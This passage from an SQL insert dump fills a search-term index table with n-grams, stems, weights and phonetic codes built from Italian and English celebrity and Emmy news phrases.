tipo',0,1,1.4333,'V23431',1,'en'),(32108,'vitiongkok','vitiongkok',0,0,0.6667,'V352',1,'en'),(32109,'vitiongkok a','vitiongkok a',0,1,1.4,'V352',1,'en'),(32110,'vitiongkok a cui','vitiongkok a cui',0,1,1.5333,'V352',1,'en'),(32111,'vivitamin','vivitamin',0,0,0.6,'V350',1,'en'),(32112,'vivitamin ytata','vivitamin ytata',0,1,1.5,'V353',1,'en'),(32113,'vivitamin ytata ogni','vivitamin ytata ogni',0,1,1.6667,'V35325',1,'en'),(32114,'vogliamo','vogliamo',0,0,0.5333,'V245',1,'en'),(32115,'volte','volt',0,0,0.3333,'V430',1,'en'),(32116,'volte lei','volt lei',0,1,1.3,'V434',1,'en'),(32117,'volte lei ha','volt lei ha',0,1,1.4,'V434',1,'en'),(32118,'vostro','vostro',0,0,0.4,'V236',1,'en'),(32119,'vostro marchio','vostro marchio',0,1,1.4667,'V236562',1,'en'),(32120,'vostro marchio di','vostro marchio di',0,1,1.5667,'V2365623',1,'en'),(32121,'vostro portafoglio','vostro portafoglio',0,1,1.6,'V236163124',1,'en'),(32122,'vostro portafoglio byblos','vostro portafoglio byblos',0,1,1.8333,'V236163124142',1,'en'),(32123,'vuole','vuol',0,0,0.3333,'V400',1,'en'),(32124,'vuole essere','vuol essere',0,1,1.4,'V426',1,'en'),(32125,'vuole essere director','vuol essere director',0,1,1.7,'V42636236',1,'en'),(32126,'vuole sganciare','vuol sganciare',0,1,1.5,'V42526',1,'en'),(32127,'vuole sganciare luxottica','vuol sganciare luxottica',0,1,1.8333,'V425264232',1,'en'),(32128,'with regard','with regard',0,1,1.3667,'W36263',3,'en'),(32129,'with regard to','with regard to',0,1,1.4667,'W36263',3,'en'),(32130,'ygozi','ygozi',0,0,0.3333,'Y200',1,'en'),(32131,'ygozi sat','ygozi sat',0,1,1.3,'Y230',1,'en'),(32132,'ygozi sat thelizabethrvizio','ygozi sat thelizabethrvizio',0,1,1.9,'Y234213612',1,'en'),(32133,'you persone','you persone',0,1,1.3667,'Y1625',1,'en'),(32134,'you persone che','you persone che',0,1,1.5,'Y16252',1,'en'),(32135,'yourself nel','yourself nel',0,1,1.4,'Y624154',1,'en'),(32136,'yourself nel lavoro','yourself nel lavoro',0,1,1.6333,'Y62415416',1,'en'),(32137,'yrgio','yrgio',0,0,0.3333,'Y620',1,'en'),(32138,'yrgio tacchini','yrgio tacchini',0,1,1.4667,'Y62325',1,'en'),(32139,'yrgio tacchini possibile','yrgio tacchini possibile',0,1,1.8,'Y623251214',1,'en'),(32140,'ysturanno','ysturanno',0,0,0.6,'Y2365',1,'en'),(32141,'ysturanno cat','ysturanno cat',0,1,1.4333,'Y236523',1,'en'),(32142,'ysturanno cat thelizabethntrali','ysturanno cat thelizabethntrali',0,1,2,'Y23652342135364',1,'en'),(32143,'ytata','ytata',0,0,0.3333,'Y300',1,'en'),(32144,'ytata ogni','ytata ogni',0,1,1.3333,'Y325',1,'en'),(32145,'ytata ogni forma','ytata ogni forma',0,1,1.5333,'Y325165',1,'en'),(32146,'\'30','30',0,0,0.2,'',1,'en'),(32147,'\'30 rock\'','30 rock',0,1,1.3,'R200',1,'en'),(32148,'\'30 rock\' and','30 rock and',0,1,1.4333,'R253',1,'en'),(32149,'\'behind','behind',0,0,0.4667,'B530',1,'en'),(32150,'\'behind the','behind the',0,1,1.3667,'B530',1,'en'),(32151,'\'behind the candelabra\'','behind the candelabra',0,1,1.7667,'B53253416',1,'en'),(32152,'\'big','big',0,0,0.2667,'B200',1,'en'),(32153,'\'big bang','big bang',0,1,1.3,'B2152',1,'en'),(32154,'\'big bang theory\'','big bang theory',0,1,1.5667,'B215236',1,'en'),(32155,'\'homeland\'','homeland',0,0,0.6667,'H5453',1,'en'),(32156,'\'homeland\' star','homeland star',0,1,1.5,'H5453236',1,'en'),(32157,'\'homeland\' star says','homeland star says',0,1,1.6667,'H54532362',1,'en'),(32158,'\'house','hous',0,0,0.4,'H200',1,'en'),(32159,'\'house of','hous of',0,1,1.3,'H210',1,'en'),(32160,'\'house of cards\'','hous of cards',0,1,1.5333,'H212632',1,'en'),(32161,'\'scandal','scandal',0,0,0.5333,'S534',1,'en'),(32162,'\'scandal olivia','scandal olivia',0,1,1.5,'S5341',1,'en'),(32163,'\'scandal olivia pope','scandal olivia pope',0,1,1.6667,'S5341',1,'en'),(32164,'2013 emmy','2013 emmy',0,1,1.3,'E500',1,'en'),(32165,'2013 emmy accolades','2013 emmy accolades',0,1,1.6333,'E52432',1,'en'),(32166,'2013 emmy awards','2013 emmy awards',0,1,1.5333,'E5632',1,'en'),(32167,'2013.kerry','2013.kerri',0,0,0.6667,'K600',1,'en'),(32168,'2013.kerry california','2013.kerri california',0,1,1.7,'K624165',1,'en'),(32169,'2013.kerry california who','2013.kerri california who',0,1,1.8333,'K624165',1,'en'),(32170,'a better','a better',0,1,1.2667,'A136',1,'en'),(32171,'a better actor','a better actor',0,1,1.4667,'A136236',1,'en'),(32172,'a comedy','a comedy',0,1,1.2667,'A253',1,'en'),(32173,'a comedy series','a comedy series',0,1,1.5,'A253262',1,'en'),(32174,'a core set','a core set',0,1,1.3333,'A2623',1,'en'),(32175,'a decision','a decision',0,1,1.3333,'A325',1,'en'),(32176,'a decision he','a decision he',0,1,1.4333,'A325',1,'en'),(32177,'a direct','a direct',0,1,1.2667,'A3623',1,'en'),(32178,'a direct answer','a direct answer',0,1,1.5,'A3623526',1,'en'),(32179,'a gut','a gut',0,1,1.1667,'A230',1,'en'),(32180,'a gut it','a gut it',0,1,1.2667,'A230',1,'en'),(32181,'a labor','a labor',0,1,1.2333,'A416',1,'en'),(32182,'a labor of','a labor of',0,1,1.3333,'A4161',1,'en'),(32183,'a little','a little',0,1,1.2667,'A434',2,'en'),(32184,'a little harder','a little harder',0,1,1.5,'A434636',1,'en'),(32185,'a locosounds','a locosounds',0,1,1.4,'A42532',1,'en'),(32186,'a locosounds daycare','a locosounds daycare',0,1,1.6667,'A42532326',1,'en'),(32187,'a miniseries','a miniseries',0,1,1.4,'A5262',1,'en'),(32188,'a miniseries or','a miniseries or',0,1,1.5,'A52626',1,'en'),(32189,'a narciso','a narciso',0,1,1.3,'A562',1,'en'),(32190,'a narciso rodriguez','a narciso rodriguez',0,1,1.6333,'A5626362',1,'en'),(32191,'a political','a political',0,1,1.3667,'A14324',1,'en'),(32192,'a political duel','a political duel',0,1,1.5333,'A1432434',1,'en'),(32193,'a sense','a sense',0,1,1.2333,'A252',1,'en'),(32194,'a sense of','a sense of',0,1,1.3333,'A2521',1,'en'),(32195,'a silver','a silver',0,1,1.2667,'A2416',1,'en'),(32196,'a silver platter','a silver platter',0,1,1.5333,'A24161436',1,'en'),(32197,'a star','a star',0,1,1.2,'A236',1,'en'),(32198,'a star and','a star and',0,1,1.3333,'A23653',1,'en'),(32199,'a three','a three',0,1,1.2333,'A360',1,'en'),(32200,'a three time','a three time',0,1,1.4,'A3635',1,'en'),(32201,'a unique','a unique',0,1,1.2667,'A520',1,'en'),(32202,'a unique style','a unique style',0,1,1.4667,'A5234',1,'en'),(32203,'a whole lot','a whole lot',0,1,1.3667,'A430',1,'en'),(32204,'aback','aback',0,0,0.3333,'A120',1,'en'),(32205,'aback by','aback by',0,1,1.2667,'A121',1,'en'),(32206,'aback by how','aback by how',0,1,1.4,'A121',1,'en'),(32207,'aback i\'ve','aback i',0,1,1.3333,'A121',1,'en'),(32208,'aback i\'ve ever','aback i ever',0,1,1.5,'A1216',1,'en'),(32209,'about life','about life',0,1,1.3333,'A1341',1,'en'),(32210,'about life after','about life after',0,1,1.5333,'A134136',1,'en'),(32211,'about this','about this',0,1,1.3333,'A132',1,'en'),(32212,'about this night','about this night',0,1,1.5333,'A132523',1,'en'),(32213,'accolades','accolad',0,0,0.6,'A2432',1,'en'),(32214,'accolades the','accolad the',0,1,1.4333,'A24323',1,'en'),(32215,'accolades the \'homeland\'','accolad the homeland',0,1,1.8,'A243235453',1,'en'),(32216,'according to him','accord to him',0,1,1.5333,'A2635235',1,'en'),(32217,'account a','account a',0,1,1.3,'A253',1,'en'),(32218,'account a decision','account a decision',0,1,1.6,'A25325',1,'en'),(32219,'actor in','actor in',0,1,1.2667,'A2365',1,'en'),(32220,'actor in a','actor in a',0,1,1.3333,'A2365',1,'en'),(32221,'actor it\'s','actor it',0,1,1.3333,'A23632',1,'en'),(32222,'actor it\'s a','actor it a',0,1,1.4,'A23632',1,'en'),(32223,'actor was','actor was',0,1,1.3,'A2362',1,'en'),(32224,'actor was taking','actor was taking',0,1,1.5333,'A23623252',1,'en'),(32225,'actor winner','actor winner',0,1,1.4,'A23656',1,'en'),(32226,'actor winner has','actor winner has',0,1,1.5333,'A236562',1,'en'),(32227,'actress','actress',0,0,0.4667,'A2362',1,'en'),(32228,'actress nominee','actress nominee',0,1,1.5,'A23625',1,'en'),(32229,'actress nominee clad','actress nominee clad',0,1,1.6667,'A23625243',1,'en'),(32230,'actress tracy','actress tracy',0,1,1.4333,'A2362362',1,'en'),(32231,'actress tracy pollan','actress tracy pollan',0,1,1.6667,'A2362362145',1,'en'),(32232,'additional red','addit red',0,1,1.4667,'A35463',1,'en'),(32233,'additional red carpet','addit red carpet',0,1,1.7,'A354632613',1,'en'),(32234,'affairs','affair',0,0,0.4667,'A162',1,'en'),(32235,'affairs because','affair because',0,1,1.5,'A16212',1,'en'),(32236,'affairs because well','affair because well',0,1,1.6667,'A162124',1,'en'),(32237,'affection','affect',0,0,0.6,'A1235',1,'en'),(32238,'affection and','affect and',0,1,1.4333,'A12353',1,'en'),(32239,'affection and luckily','affect and luckily',0,1,1.7,'A12353424',1,'en'),(32240,'after cancer','after cancer',0,1,1.4,'A1362526',1,'en'),(32241,'after cancer was','after cancer was',0,1,1.5333,'A13625262',1,'en'),(32242,'after cancer you','after cancer you',0,1,1.5333,'A1362526',1,'en'),(32243,'after got','after got',0,1,1.3,'A13623',1,'en'),(32244,'after got cancer','after got cancer',0,1,1.5333,'A136232526',1,'en'),(32245,'after his','after his',0,1,1.3,'A1362',1,'en'),(32246,'after his win','after his win',0,1,1.4333,'A13625',1,'en'),(32247,'again is','again is',0,1,1.2667,'A252',1,'en'),(32248,'again is really','again is really',0,1,1.5,'A25264',1,'en'),(32249,'again to','again to',0,1,1.2667,'A253',1,'en'),(32250,'again to nurture','again to nurture',0,1,1.5333,'A2535636',1,'en'),(32251,'ago','ago',1,0,0.025,'A200',3,'en'),(32252,'ago getting','ago getting',0,1,1.3667,'A2352',1,'en'),(32253,'ago getting married','ago getting married',0,1,1.6333,'A2352563',1,'en'),(32254,'alec','alec',0,0,0.2667,'A420',1,'en'),(32255,'alec baldwin','alec baldwin',0,1,1.4,'A421435',1,'en'),(32256,'alec baldwin john','alec baldwin john',0,1,1.5667,'A42143525',1,'en'),(32257,'allowed we','allow we',0,1,1.3333,'A430',1,'en'),(32258,'allowed we got','allow we got',0,1,1.4667,'A4323',1,'en'),(32259,'along with father','along with father',0,1,1.5667,'A4523136',1,'en'),(32260,'am an','am an',0,1,1.1667,'A500',1,'en'),(32261,'am an experienced','am an experienced',0,1,1.5667,'A5216523',1,'en'),(32262,'amazed','amaz',0,0,0.4,'A523',1,'en'),(32263,'amazed me','amaz me',0,1,1.3,'A5235',1,'en'),(32264,'amazed me i','amaz me i',0,1,1.3667,'A5235',1,'en'),(32265,'amazing things','amaz things',0,1,1.4667,'A5252352',1,'en'),(32266,'amazing things happened','amaz things happened',0,1,1.7667,'A5252352153',1,'en'),(32267,'america','america',0,0,0.4667,'A562',1,'en'),(32268,'america todaymandy','america todaymandy',0,1,1.6,'A562353',1,'en'),(32269,'america todaymandy patinkin','america todaymandy patinkin',0,1,1.9,'A56235313525',1,'en'),(32270,'america todaymichael','america todaymichael',0,1,1.6667,'A5623524',1,'en'),(32271,'america todaymichael j','america todaymichael j',0,1,1.7333,'A56235242',1,'en'),(32272,'america todaytina','america todaytina',0,1,1.5667,'A56235',1,'en'),(32273,'america todaytina fey','america todaytina fey',0,1,1.7,'A562351',1,'en'),(32274,'an additional','an additional',0,1,1.4333,'A5354',2,'en'),(32275,'an additional red','an additional red',0,1,1.5667,'A535463',1,'en'),(32276,'an arrival','an arrival',0,1,1.3333,'A5614',1,'en'),(32277,'an arrival of','an arrival of',0,1,1.4333,'A56141',1,'en'),(32278,'an easy','an easy',0,1,1.2333,'A520',1,'en'),(32279,'an easy team','an easy team',0,1,1.4,'A5235',1,'en'),(32280,'an emmy','an emmy',0,1,1.2333,'A500',1,'en'),(32281,'an emmy for','an emmy for',0,1,1.3667,'A516',1,'en'),(32282,'an experienced','an experienced',0,1,1.4667,'A5216523',1,'en'),(32283,'an experienced person','an experienced person',0,1,1.7,'A52165231625',1,'en'),(32284,'and a three','and a three',0,1,1.3667,'A536',1,'en'),(32285,'and alec','and alec',0,1,1.2667,'A5342',1,'en'),(32286,'and alec baldwin','and alec baldwin',0,1,1.5333,'A53421435',1,'en'),(32287,'and clutch','and clutch',0,1,1.3333,'A532432',1,'en'),(32288,'and clutch and','and clutch and',0,1,1.4667,'A53243253',1,'en'),(32289,'and eighth','and eighth',0,1,1.3333,'A5323',1,'en'),(32290,'and eighth overall','and eighth overall',0,1,1.6,'A5323164',1,'en'),(32291,'and fortuitous','and fortuitous',0,1,1.4667,'A531632',1,'en'),(32292,'and fortuitous two','and fortuitous two',0,1,1.6,'A5316323',1,'en'),(32293,'and francis','and francis',0,1,1.3667,'A531652',1,'en'),(32294,'and francis underwood','and francis underwood',0,1,1.7,'A5316525363',1,'en'),(32295,'and fred','and fred',0,1,1.2667,'A53163',1,'en'),(32296,'and fred leighton','and fred leighton',0,1,1.5667,'A531634235',1,'en'),(32297,'and he can\'t','and he can',0,1,1.4,'A53253',1,'en'),(32298,'and her','and her',0,1,1.2333,'A536',1,'en'),(32299,'and her husband','and her husband',0,1,1.5,'A5362153',1,'en'),(32300,'and i looked','and i looked',0,1,1.4,'A53423',1,'en'),(32301,'and jewellery','and jewellery',0,1,1.4333,'A53246',2,'en'),(32302,'and jewellery from','and jewellery from',0,1,1.6,'A53246165',1,'en'),(32303,'and lead','and lead',0,1,1.2667,'A5343',2,'en'),(32304,'and lead actor','and lead actor',0,1,1.4667,'A5343236',1,'en'),(32305,'and lead comedic','and lead comedic',0,1,1.5333,'A53432532',1,'en'),(32306,'and luckily','and luckily',0,1,1.3667,'A53424',1,'en'),(32307,'and luckily for','and luckily for',0,1,1.5,'A5342416',1,'en'),(32308,'and said','and said',0,1,1.2667,'A5323',1,'en'),(32309,'and said backstage','and said backstage',0,1,1.6,'A53231232',1,'en'),(32310,'and the appeal','and the appeal',0,1,1.4667,'A5314',1,'en'),(32311,'and the concept','and the concept',0,1,1.5,'A5325213',1,'en'),(32312,'and thought','and thought',0,1,1.3667,'A5323',1,'en'),(32313,'and thought surprise','and thought surprise',0,1,1.6667,'A532326162',1,'en'),(32314,'and tivo','and tivo',0,1,1.2667,'A531',1,'en'),(32315,'and tivo it','and tivo it',0,1,1.3667,'A5313',1,'en'),(32316,'and to be','and to be',0,1,1.3,'A531',1,'en'),(32317,'answer but','answer but',0,1,1.3333,'A52613',1,'en'),(32318,'answer but allowed','answer but allowed',0,1,1.6,'A5261343',1,'en'),(32319,'anything','anyth',0,0,0.5333,'A5352',1,'en'),(32320,'anything before','anyth before',0,1,1.5,'A535216',1,'en'),(32321,'anything before but','anyth before but',0,1,1.6333,'A53521613',1,'en'),(32322,'appeal','appeal',0,0,0.4,'A140',2,'en'),(32323,'appeal for','appeal for',0,1,1.3333,'A1416',1,'en'),(32324,'appeal for devoted','appeal for devoted',0,1,1.6,'A1416313',1,'en'),(32325,'are so','ar so',0,1,1.2,'A620',2,'en'),(32326,'are so fleeting','ar so fleeting',0,1,1.5,'A6214352',1,'en'),(32327,'are work','ar work',0,1,1.2667,'A620',1,'en'),(32328,'are work a','ar work a',0,1,1.3333,'A620',1,'en'),(32329,'arrival','arriv',0,0,0.4667,'A614',1,'en'),(32330,'arrival of','arriv of',0,1,1.3333,'A6141',1,'en'),(32331,'arrival of baby','arriv of baby',0,1,1.5,'A6141',1,'en'),(32332,'arrival of our','arriv of our',0,1,1.4667,'A61416',1,'en'),(32333,'arrives','arriv',0,0,0.4667,'A612',1,'en'),(32334,'arrives along','arriv along',0,1,1.4333,'A612452',1,'en'),(32335,'arrives along with','arriv along with',0,1,1.6,'A6124523',1,'en'),(32336,'at her and','at her and',0,1,1.3333,'A3653',1,'en'),(32337,'at nbc','at nbc',0,1,1.2,'A3512',1,'en'),(32338,'at nbc never','at nbc never',0,1,1.4,'A3512516',1,'en'),(32339,'at putting','at putting',0,1,1.3333,'A31352',1,'en'),(32340,'at putting children','at putting children',0,1,1.6333,'A313524365',1,'en'),(32341,'at the 2013','at the 2013',0,1,1.3667,'A300',1,'en'),(32342,'attention','attent',0,0,0.6,'A3535',1,'en'),(32343,'attention means','attent means',0,1,1.5,'A35352',1,'en'),(32344,'attention means they','attent means they',0,1,1.6667,'A353523',1,'en'),(32345,'awards douglas','award douglas',0,1,1.4667,'A6323242',1,'en'),(32346,'awards douglas the','award douglas the',0,1,1.6,'A63232423',1,'en'),(32347,'awards red','award red',0,1,1.3333,'A63263',1,'en'),(32348,'awards red new','award red new',0,1,1.4667,'A632635',1,'en'),(32349,'babies','babi',0,0,0.4,'B200',1,'en'),(32350,'babies by','babi by',0,1,1.3,'B210',1,'en'),(32351,'babies by the','babi by the',0,1,1.4333,'B213',1,'en'),(32352,'baby','babi',0,0,0.2667,'B000',2,'en'),(32353,'baby baccarin','babi baccarin',0,1,1.4333,'B265',1,'en'),(32354,'baby baccarin the','babi baccarin the',0,1,1.5667,'B2653',1,'en'),(32355,'baby central','babi central',0,1,1.4,'B25364',1,'en'),(32356,'baby central and','babi central and',0,1,1.5333,'B2536453',1,'en'),(32357,'baby to','babi to',0,1,1.2333,'B300',1,'en'),(32358,'baby to sleep','babi to sleep',0,1,1.4333,'B3241',1,'en'),(32359,'baccarin','baccarin',0,0,0.5333,'B265',1,'en'),(32360,'baccarin claire','baccarin claire',0,1,1.5,'B265246',1,'en'),(32361,'baccarin claire danes','baccarin claire danes',0,1,1.7,'B265246352',1,'en'),(32362,'baccarin the','baccarin the',0,1,1.4,'B2653',1,'en'),(32363,'baccarin the homeland','baccarin the homeland',0,1,1.7,'B26535453',1,'en'),(32364,'back again','back again',0,1,1.3333,'B250',1,'en'),(32365,'back again is','back again is',0,1,1.4333,'B252',1,'en'),(32366,'backstage','backstag',0,0,0.6,'B232',1,'en'),(32367,'backstage after','backstag after',0,1,1.5,'B232136',1,'en'),(32368,'backstage after his','backstag after his',0,1,1.6333,'B2321362',1,'en'),(32369,'backstage that','backstag that',0,1,1.4667,'B2323',1,'en'),(32370,'backstage that she','backstag that she',0,1,1.6,'B23232',1,'en'),(32371,'baldwin','baldwin',0,0,0.4667,'B435',1,'en'),(32372,'baldwin john','baldwin john',0,1,1.4,'B43525',1,'en'),(32373,'baldwin john macmeserta','baldwin john macmeserta',0,1,1.7667,'B4352525263',1,'en'),(32374,'bang theory\'','bang theory',0,1,1.4,'B5236',1,'en'),(32375,'bang theory\' star','bang theory star',0,1,1.5667,'B5236236',1,'en'),(32376,'barroso','barroso',0,0,0.4667,'B620',1,'en'),(32377,'barroso and','barroso and',0,1,1.3667,'B6253',1,'en'),(32378,'barroso and her','barroso and her',0,1,1.5,'B62536',1,'en'),(32379,'be a better','be a better',0,1,1.3667,'B360',1,'en'),(32380,'be an easy','be an easy',0,1,1.3333,'B520',1,'en'),(32381,'be global','be global',0,1,1.3,'B2414',1,'en'),(32382,'be global domination','be global domination',0,1,1.6667,'B24143535',1,'en'),(32383,'be here','be here',0,1,1.2333,'B600',1,'en'),(32384,'be here with','be here with',0,1,1.4,'B630',1,'en'),(32385,'be my','be my',0,1,1.1667,'B500',1,'en'),(32386,'be my date','be my date',0,1,1.3333,'B530',1,'en'),(32387,'be on','be on',0,1,1.1667,'B500',1,'en'),(32388,'be on the','be on the',0,1,1.3,'B530',1,'en'),(32389,'be people','be people',0,1,1.3,'B400',1,'en'),(32390,'be people i\'ve','be people i',0,1,1.4667,'B410',1,'en'),(32391,'be thing','be thing',0,1,1.2667,'B352',1,'en'),(32392,'be thing about','be thing about',0,1,1.4667,'B35213',1,'en'),(32393,'because the','becaus the',0,1,1.3667,'B230',2,'en'),(32394,'because the show','becaus the show',0,1,1.5333,'B232',1,'en'),(32395,'because well','becaus well',0,1,1.4,'B240',1,'en'),(32396,'because well i','becaus well i',0,1,1.4667,'B240',1,'en'),(32397,'before but','befor but',0,1,1.3333,'B613',1,'en'),(32398,'before but for','befor but for',0,1,1.4667,'B61316',1,'en'),(32399,'best dramatic','best dramatic',0,1,1.4333,'B236532',1,'en'),(32400,'best dramatic actress','best dramatic actress',0,1,1.7,'B236532362',1,'en'),(32401,'better actor','better actor',0,1,1.4,'B36236',1,'en'),(32402,'better actor it\'s','better actor it',0,1,1.5667,'B3623632',1,'en'),(32403,'between','between',0,0,0.4667,'B350',1,'en'),(32404,'between \'scandal','between scandal',0,1,1.5333,'B352534',1,'en'),(32405,'between \'scandal olivia','between scandal olivia',0,1,1.7667,'B3525341',1,'en'),(32406,'both loving','both loving',0,1,1.3667,'B34152',1,'en'),(32407,'both loving and','both loving and',0,1,1.5,'B3415253',1,'en'),(32408,'budget management','budget management',0,1,1.5667,'B3235253',1,'en'),(32409,'budget management nominations','budget management nominations',0,1,1.9667,'B32352535352',1,'en'),(32410,'business pages 4','busi pages 4',0,1,1.5333,'B25212',1,'en'),(32411,'but allowed','but allowed',0,1,1.3667,'B343',1,'en'),(32412,'but allowed we','but allowed we',0,1,1.4667,'B343',1,'en'),(32413,'but for','but for',0,1,1.2333,'B316',1,'en'),(32414,'but for reasons','but for reasons',0,1,1.5,'B316252',1,'en'),(32415,'but the','but the',0,1,1.2333,'B300',1,'en'),(32416,'but the actor','but the actor',0,1,1.4333,'B3236',1,'en'),(32417,'by how','by how',0,1,1.2,'B000',1,'en'),(32418,'by how demonstrative','by how demonstrative',0,1,1.6667,'B3523631',1,'en'),(32419,'by the upcoming','by the upcoming',0,1,1.5,'B31252',1,'en'),(32420,'california','california',0,0,0.6667,'C4165',1,'en'),(32421,'california who','california who',0,1,1.4667,'C4165',1,'en'),(32422,'california who does','california who does',0,1,1.6333,'C416532',1,'en'),(32423,'came','came',0,0,0.2667,'C500',2,'en'),(32424,'came out','came out',0,1,1.2667,'C530',1,'en'),(32425,'came out i','came out i',0,1,1.3333,'C530',1,'en'),(32426,'can\'t wait','can wait',0,1,1.3333,'C530',1,'en'),(32427,'can\'t wait for','can wait for',0,1,1.4667,'C5316',1,'en'),(32428,'cancer','cancer',0,0,0.4,'C526',1,'en'),(32429,'cancer the','cancer the',0,1,1.3333,'C5263',1,'en'),(32430,'cancer the first','cancer the first',0,1,1.5333,'C52631623',1,'en'),(32431,'cancer was','cancer was',0,1,1.3333,'C5262',1,'en'),(32432,'cancer was both','cancer was both',0,1,1.5,'C526213',1,'en'),(32433,'cancer you','cancer you',0,1,1.3333,'C526',1,'en'),(32434,'cancer you feel','cancer you feel',0,1,1.5,'C52614',1,'en'),(32435,'candelabra\'','candelabra',0,0,0.7333,'C53416',1,'en'),(32436,'candelabra\' star','candelabra star',0,1,1.5333,'C53416236',1,'en'),(32437,'candelabra\' star and','candelabra star and',0,1,1.6667,'C5341623653',1,'en'),(32438,'cards\'','card',0,0,0.4,'C632',1,'en'),(32439,'cards\' extremely','card extremely',0,1,1.5333,'C6323654',1,'en'),(32440,'cards\' extremely diplomatic','card extremely diplomatic',0,1,1.9,'C6323654314532',1,'en'),(32441,'carpet','carpet',0,0,0.4,'C613',2,'en'),(32442,'carpet event','carpet event',0,1,1.4,'C613153',1,'en'),(32443,'carpet event the','carpet event the',0,1,1.5333,'C613153',1,'en'),(32444,'center according','center according',0,1,1.5333,'C53626352',1,'en'),(32445,'center according to','center according to',0,1,1.6333,'C536263523',1,'en'),(32446,'central and','central and',0,1,1.3667,'C536453',1,'en'),(32447,'central and he','central and he',0,1,1.4667,'C536453',1,'en'),(32448,'change the','chang the',0,1,1.3333,'C523',1,'en'),(32449,'change the tone','chang the tone',0,1,1.5,'C5235',1,'en'),(32450,'cheadle','cheadl',0,0,0.4667,'C340',1,'en'),(32451,'cheadle and','cheadl and',0,1,1.3667,'C3453',1,'en'),(32452,'cheadle and alec','cheadl and alec',0,1,1.5333,'C345342',1,'en'),(32453,'child','child',0,0,0.3333,'C430',1,'en'),(32454,'child owing','child owing',0,1,1.3667,'C4352',1,'en'),(32455,'child owing to','child owing to',0,1,1.4667,'C43523',1,'en'),(32456,'children to','children to',0,1,1.3667,'C43653',1,'en'),(32457,'children to sleep','children to sleep',0,1,1.5667,'C43653241',1,'en'),(32458,'clad','clad',0,0,0.2667,'C430',1,'en'),(32459,'clad in','clad in',0,1,1.2333,'C435',1,'en'),(32460,'clad in marchesa','clad in marchesa',0,1,1.5333,'C43562',1,'en'),(32461,'claire','clair',0,0,0.4,'C460',1,'en'),(32462,'claire danes','clair danes',0,1,1.4,'C46352',1,'en'),(32463,'claire danes since','clair danes since',0,1,1.6,'C4635252',1,'en'),(32464,'claire\'s','clair',0,0,0.5333,'C462',1,'en'),(32465,'claire\'s baby','clair baby',0,1,1.4333,'C4621',1,'en'),(32466,'claire\'s baby to','clair baby to',0,1,1.5333,'C46213',1,'en'),(32467,'clutch','clutch',0,0,0.4,'C432',1,'en'),(32468,'clutch and','clutch and',0,1,1.3333,'C43253',1,'en'),(32469,'clutch and jewellery','clutch and jewellery',0,1,1.6667,'C43253246',1,'en'),(32470,'co star','co star',0,1,1.2333,'C360',1,'en'),(32471,'co star morena','co star morena',0,1,1.4667,'C36565',1,'en'),(32472,'come back','come back',0,1,1.3,'C512',1,'en'),(32473,'come back again','come back again',0,1,1.5,'C5125',1,'en'),(32474,'comedic','comed',0,0,0.4667,'C532',1,'en'),(32475,'comedic actor','comed actor',0,1,1.4333,'C53236',1,'en'),(32476,'comedic actor winner','comed actor winner',0,1,1.6667,'C5323656',1,'en'),(32477,'comedy','comedi',0,0,0.4,'C530',1,'en'),(32478,'comedy fans','comedi fans',0,1,1.3667,'C53152',1,'en'),(32479,'comedy fans get','comedi fans get',0,1,1.5,'C531523',1,'en'),(32480,'comedy series','comedi series',0,1,1.4333,'C53262',1,'en'),(32481,'comedy series \'30','comedi series 30',0,1,1.5667,'C53262',1,'en'),(32482,'comedy that','comedi that',0,1,1.3667,'C530',1,'en'),(32483,'comedy that made','comedi that made',0,1,1.5333,'C5353',1,'en'),(32484,'concept','concept',0,0,0.4667,'C5213',2,'en'),(32485,'concept you','concept you',0,1,1.3667,'C5213',1,'en'),(32486,'concept you get','concept you get',0,1,1.5,'C521323',1,'en'),(32487,'core set','core set',0,1,1.2667,'C623',1,'en'),(32488,'core set of','core set of',0,1,1.3667,'C6231',1,'en'),(32489,'could','could',0,0,0.3333,'C430',3,'en'),(32490,'could be','could be',0,1,1.2667,'C431',1,'en'),(32491,'could be my','could be my',0,1,1.3667,'C4315',1,'en'),(32492,'could kevork','could kevork',0,1,1.4,'C432162',1,'en'),(32493,'could kevork djansezian','could kevork djansezian',0,1,1.7667,'C43216232525',1,'en'),(32494,'daman','daman',0,0,0.3333,'D500',1,'en'),(32495,'damon','damon',0,0,0.3333,'D500',1,'en'),(32496,'damon reach','damon reach',0,1,1.3667,'D562',1,'en'),(32497,'damon reach the','damon reach the',0,1,1.5,'D5623',1,'en'),(32498,'dan','dan',0,0,0.2,'D500',1,'en'),(32499,'dan macmedan','dan macmedan',0,1,1.4,'D52535',1,'en'),(32500,'dan macmedan america','dan macmedan america',0,1,1.6667,'D5253562',1,'en'),(32501,'danes','dane',0,0,0.3333,'D520',1,'en'),(32502,'danes since','dane since',0,1,1.3667,'D5252',1,'en'),(32503,'danes since the','dane since the',0,1,1.5,'D52523',1,'en'),(32504,'data i','data i',0,1,1.2,'D000',1,'en'),(32505,'data i think','data i think',0,1,1.4,'D520',1,'en'),(32506,'date i','date i',0,1,1.2,'D000',1,'en'),(32507,'date i must','date i must',0,1,1.3667,'D523',1,'en'),(32508,'daycare','daycar',0,0,0.4667,'D260',1,'en'),(32509,'daycare center','daycar center',0,1,1.4667,'D262536',1,'en'),(32510,'daycare center according','daycar center according',0,1,1.8,'D26253626352',1,'en'),(32511,'decision','decis',0,0,0.5333,'D250',1,'en'),(32512,'decision he','decis he',0,1,1.3667,'D250',1,'en'),(32513,'decision he made','decis he made',0,1,1.5333,'D253',1,'en'),(32514,'demonstrative','demonstr',0,0,0.8667,'D523631',1,'en'),(32515,'demonstrative i','demonstr i',0,1,1.5,'D523631',1,'en'),(32516,'demonstrative i felt','demonstr i felt',0,1,1.6667,'D52363143',1,'en'),(32517,'devoted','devot',0,0,0.4667,'D130',1,'en'),(32518,'devoted fans','devot fans',0,1,1.4,'D13152',1,'en'),(32519,'devoted fans i','devot fans i',0,1,1.4667,'D13152',1,'en'),(32520,'didn','didn',0,0,0.2667,'D500',1,'en'),(32521,'didn offer','didn offer',0,1,1.3333,'D516',1,'en'),(32522,'didn offer a','didn offer a',0,1,1.4,'D516',1,'en'),(32523,'diplomatic','diplomat',0,0,0.6667,'D14532',1,'en'),(32524,'diplomatic best','diplomat best',0,1,1.5,'D14532123',1,'en'),(32525,'diplomatic best dramatic','diplomat best dramatic',0,1,1.8,'D145321236532',1,'en'),(32526,'direct','direct',0,0,0.4,'D623',1,'en'),(32527,'direct answer','direct answer',0,1,1.4333,'D623526',1,'en'),(32528,'direct answer but','direct answer but',0,1,1.5667,'D62352613',1,'en'),(32529,'djansezian','djansezian',0,0,0.6667,'D2525',1,'en'),(32530,'djansezian getty','djansezian 